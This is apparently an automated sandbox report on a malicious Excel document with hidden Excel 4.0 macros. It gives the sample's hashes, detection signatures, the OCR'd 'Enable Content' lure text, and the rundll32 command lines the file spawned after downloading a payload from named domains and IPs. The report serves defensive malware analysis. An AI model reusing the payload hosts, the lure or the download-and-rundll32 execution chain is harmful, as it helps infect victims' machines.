Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report afdab907_by_Libranalysis

Overview

General Information

Sample Name:afdab907_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:412299
MD5:afdab90737c55a669e7025df2fa86efe
SHA1:39a056a263368dcb1fb98a2226eae7c9d1488453
SHA256:d61e90fe268528db7a0eee66f064270a519b2843a59642923b137ec2b81fe5e2
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2620 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2564 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2508, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 2620

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 2 Once You have Enable Editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 , from the yellow bar above 15 D e 16 17 I 18 I WHY I CANNOT OPEN THIS DOCUME
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: afdab907_by_Libranalysis.xlsInitial sample: CALL
Source: afdab907_by_Libranalysis.xlsInitial sample: CALL
Source: afdab907_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: afdab907_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: afdab907_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\8AEE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE0FB.tmpJump to behavior
Source: afdab907_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
afdab907_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpfalse
    		high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpfalse
      		high
      http://investor.msn.comrundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpfalse
        		high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpfalse
          		high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2120887471.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2114086942.0000000001D47000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpfalse
            		high
            http://investor.msn.com/rundll32.exe, 00000002.00000002.2120510219.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2113904598.0000000001B60000.00000002.00000001.sdmpfalse
              		high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              192.185.39.58
              		signifysystem.comUnited States
              		46606UNIFIEDLAYER-AS-1USfalse
              192.185.32.232
              		fcventasyservicios.clUnited States
              		46606UNIFIEDLAYER-AS-1USfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412299
              Start date:12.05.2021
              Start time:15:38:59
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:afdab907_by_Libranalysis (renamed file extension from none to xls)
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal68.expl.evad.winXLS@5/11@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.241.78.254, 67.26.73.254, 8.241.90.254, 8.241.83.126, 8.241.126.249
              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              192.185.39.588100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                    32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                      9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                            192.185.32.2328100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          signifysystem.com8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.39.58
                                          fcventasyservicios.cl8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          UNIFIEDLAYER-AS-1US70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                          • 192.254.185.244
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 192.232.222.43
                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                          • 67.20.76.71
                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                          • 192.185.171.219
                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                          • 162.241.169.22
                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 192.185.171.219
                                          RFQ.exeGet hashmaliciousBrowse
                                          • 192.185.129.32
                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                          • 162.241.62.63
                                          in.exeGet hashmaliciousBrowse
                                          • 162.241.244.112
                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                          • 162.144.13.239
                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                          • 108.167.180.164
                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                          • 108.167.180.164
                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                          • 108.179.232.90
                                          UNIFIEDLAYER-AS-1US70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                          • 192.254.185.244
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 192.232.222.43
                                          abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                          • 67.20.76.71
                                          Revised Invoice pdf.exeGet hashmaliciousBrowse
                                          • 192.185.171.219
                                          DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                                          • 162.241.169.22
                                          dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                                          • 192.185.171.219
                                          RFQ.exeGet hashmaliciousBrowse
                                          • 192.185.129.32
                                          Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                                          • 162.241.62.63
                                          in.exeGet hashmaliciousBrowse
                                          • 162.241.244.112
                                          PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                                          • 162.144.13.239
                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                          • 108.167.180.164
                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                          • 108.167.180.164
                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                          • 108.179.232.90

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          7dcce5b76c8b17472d024758970a406b7bYDInO.rtfGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          DHL AWB.xlsxGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          Purchase Agreement.docxGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
                                          export of document 555091.xlsmGet hashmaliciousBrowse
                                          • 192.185.32.232
                                          • 192.185.39.58
